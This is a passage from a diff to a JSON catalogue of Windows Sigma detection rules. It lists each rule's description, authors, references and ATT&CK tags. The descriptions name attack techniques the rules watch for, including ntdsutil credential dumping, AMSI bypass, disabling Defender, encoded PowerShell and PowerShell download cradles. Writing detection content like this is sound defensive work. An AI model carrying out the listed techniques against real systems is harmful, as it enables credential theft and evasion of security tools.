"attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "2afafd61-6aae-4df4-baed-139fa1f4c345", + "value": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)" + }, + { + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/07", + "falsepositive": [ + "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." + ], + "filename": "proc_creation_win_ntfs_short_name_path_use_cli.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/frack113/status/1555830623633375232", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "349d891d-fef0-4fe4-bc53-eee623a15969", + "value": "Use Short Name Path in Command Line" + }, + { + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/07", + "falsepositive": [ + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." + ], + "filename": "proc_creation_win_ntfs_short_name_path_use_image.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/frack113/status/1555830623633375232", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "a96970af-f126-420d-90e1-d37bf25e50e1", + "value": "Use Short Name Path in Image" + }, + { + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." + ], + "filename": "proc_creation_win_ntfs_short_name_use_cli.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/jonasLyk/status/1555914501802921984", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", + "value": "Use NTFS Short Name in Command Line" + }, + { + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_ntfs_short_name_use_image.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/jonasLyk/status/1555914501802921984", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", + "value": "Use NTFS Short Name in Image" + }, + { + "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_obfuscated_ip_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://h.43z.one/ipconverter/", + "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml" + ], + "tags": [ + "attack.discovery" + ] + }, + "uuid": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", + "value": "Obfuscated IP Download" + }, + { + "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_obfuscated_ip_via_cli.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://h.43z.one/ipconverter/", + "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml" + ], + "tags": [ + "attack.discovery" + ] + }, + "uuid": "56d19cb4-6414-4769-9644-1ed35ffbb148", + "value": "Obfuscated IP Via CLI" + }, + { + "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_office_applications_spawning_wmi_commandline.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_applications_spawning_wmi_commandline.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "518643ba-7d9c-4fa5-9f37-baed36059f6a", + "value": "Office Applications Spawning Wmi Cli" + }, + { + "description": "Detects Office Applications executing a Windows child process including directory traversal patterns", + "meta": { + "author": "@SBousseaden (idea), Christian Burkard (rule)", + "creation_date": "2022/06/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_office_dir_traversal_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1531653369546301440", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "868955d9-697e-45d4-a3da-360cefd7c216", + "value": "Office Directory Traversal CommandLine" + }, + { + "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_office_proxy_exec_wmic.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_proxy_exec_wmic.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "value": "Office Processes Proxy Execution Through WMIC" + }, + { + "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio", + "meta": { + "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team", + "creation_date": "2018/04/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_office_shell.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_shell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "438025f9-5856-4663-83f7-52f878a70a50", + "value": "Microsoft Office Product Spawning Windows Shell" + }, + { + "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_office_spawning_wmi_commandline.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawning_wmi_commandline.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "04f5363a-6bca-42ff-be70-0d28bf629ead", + "value": "Office Applications Spawning Wmi Cli Alternate" + }, + { + "description": "Detects an executable in the users directory started from Microsoft Word, Excel, Powerpoint, Publisher or Visio", + "meta": { + "author": "Jason Lynch", + "creation_date": "2019/04/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "sha256=23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57c", + "https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" + ] + }, + "uuid": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "value": "MS Office Product Spawning Exe in User Dir" + }, + { + "description": "Detects svchost process spawning an instance of an office application. This happens when the initial word application create an instance of one of the office COM objects such as 'Word.Application', 'Excel.Application'...etc. This can be used by malicious actor to create a malicious office document with macros on the fly. (See vba2clr project in reference)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/13", + "falsepositive": [ + "Legitimate usage of office automation via scripting" + ], + "filename": "proc_creation_win_office_svchost_child.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic", + "https://github.com/med0x2e/vba2clr", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", + "value": "Svchost Spawning Office Application" + }, + { + "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Outlook", + "meta": { + "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team", + "creation_date": "2022/02/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_outlook_shell.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_outlook_shell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "208748f7-881d-47ac-a29c-07ea84bf691d", + "value": "Microsoft Outlook Product Spawning Windows Shell" + }, + { + "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/22", + "falsepositive": [ + "Legitimate use of the PDQDeploy tool to execute these commands" + ], + "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/malmoeb/status/1550483085472432128", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", + "value": "Suspicious Execution Of PDQDeployRunner" + }, + { + "description": "Detect use of PDQ Deploy remote admin tool", + "meta": { + "author": "frack113", + "creation_date": "2022/10/01", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_pdq_deploy.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md", + "https://www.pdq.com/pdq-deploy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdq_deploy.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1072" + ] + }, + "uuid": "d679950c-abb7-43a6-80fb-2a480c4fc450", + "value": "Use of PDQ Deploy Remote Adminstartion Tool" + }, + { + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_persistence_typed_paths.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/dez_/status/1560101453150257154", + "https://forensafe.com/blogs/typedpaths.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "value": "Persistence Via TypedPaths - CommandLine" + }, + { + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/05", + "falsepositive": [ + "Very unlikely" + ], + "filename": "proc_creation_win_pingback_backdoor.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pingback_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.001" + ] + }, + "uuid": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", + "value": "Pingback Backdoor" + }, + { + "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading started from an uncommon location", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/06/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_plugx_susp_exe_locations.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/", + "https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plugx_susp_exe_locations.yml" + ], + "tags": [ + "attack.s0013", + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "aeab5ec5-be14-471a-80e8-e344418305c2", + "value": "Executable Used by PlugX in Uncommon Location" + }, + { + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "meta": { + "author": "Teymur Kheirkhabarov", + "creation_date": "2019/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", + "value": "Possible Privilege Escalation via Service Permissions Weakness" + }, + { + "description": "Detects Request to amsiInitFailed that can be used to disable AMSI Scanning", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/08/17", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_amsi_bypass.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mattifestation/status/735261176745988096", + "https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "value": "Powershell AMSI Bypass via .NET Reflection" + }, + { + "description": "Detects audio capture via PowerShell Cmdlet.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate audio capture by legitimate user." + ], + "filename": "proc_creation_win_powershell_audio_capture.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", + "https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ] + }, + "uuid": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "value": "Audio Capture via PowerShell" + }, + { + "description": "Detects Base64 encoded Shellcode", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/11/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_b64_shellcode.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1063072865992523776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_b64_shellcode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", + "value": "PowerShell Base64 Encoded Shellcode" + }, + { + "description": "Detects specific encoding method of cOnvErTTO-SECUreStRIng in the PowerShell command lines", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "creation_date": "2020/10/11", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "74403157-20f5-415d-89a7-c505779585cf", + "value": "Encoded PowerShell Command Line Usage of ConvertTo-SecureString" + }, + { + "description": "Detects the PowerShell command lines with reversed strings", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "creation_date": "2020/10/11", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "value": "Suspicious PowerShell Cmdline" + }, + { + "description": "Detects the PowerShell command lines with special characters", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unlikely", + "Amazon SSM Document Worker", + "Windows Defender ATP" + ], + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "d7bcd677-645d-4691-a8d4-7a5602b780d1", + "value": "Suspicious PowerShell Command Line" + }, + { + "description": "Detects specific combinations of encoding methods in the PowerShell command lines", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "creation_date": "2020/10/11", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_cmdline_specific_comb_methods.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", + "value": "Encoded PowerShell Command Line" + }, + { + "description": "Detects specific combinations of encoding methods in the PowerShell command lines", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "creation_date": "2022/07/06", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_cmdline_susp_comb_methods.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_susp_comb_methods.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "5b572dcf-254b-425c-a8c5-d9af6bea35a6", + "value": "Suspicious Xor PowerShell Command Line" + }, + { + "description": "Detects base64 encoded \"MpPreference\" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/04", + "falsepositive": [ + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" + ], + "filename": "proc_creation_win_powershell_defender_base64.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_base64.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "c6fb44c6-71f5-49e6-9462-1425d328aee3", + "value": "Powershell Defender Base64 MpPreference" + }, + { + "description": "Detects requests to disable Microsoft Defender features using PowerShell commands", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/03", + "falsepositive": [ + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" + ], + "filename": "proc_creation_win_powershell_defender_disable_feature.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", + "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", + "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "1ec65a5f-9473-4f12-97da-622044d6df21", + "value": "Powershell Defender Disable Scan Feature" + }, + { + "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/04/29", + "falsepositive": [ + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" + ], + "filename": "proc_creation_win_powershell_defender_exclusion.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "17769c90-230e-488b-a463-e05c08e9d48f", + "value": "Powershell Defender Exclusion" + }, + { + "description": "Detects PowerShell Strings applied to rundll as seen in PowerShdll.dll", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/08/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_dll_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_dll_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "value": "Detection of PowerShell Execution via DLL" + }, + { + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "meta": { + "author": "Harish Segar (rule)", + "creation_date": "2020/03/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_downgrade_attack.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "b3512211-c67e-4707-bedc-66efc7848863", + "value": "PowerShell Downgrade Attack" + }, + { + "description": "Detects a Powershell process that contains download commands in its command line string", + "meta": { + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", + "value": "PowerShell Download from URL" + }, + { + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "meta": { + "author": "Florian Roth", + 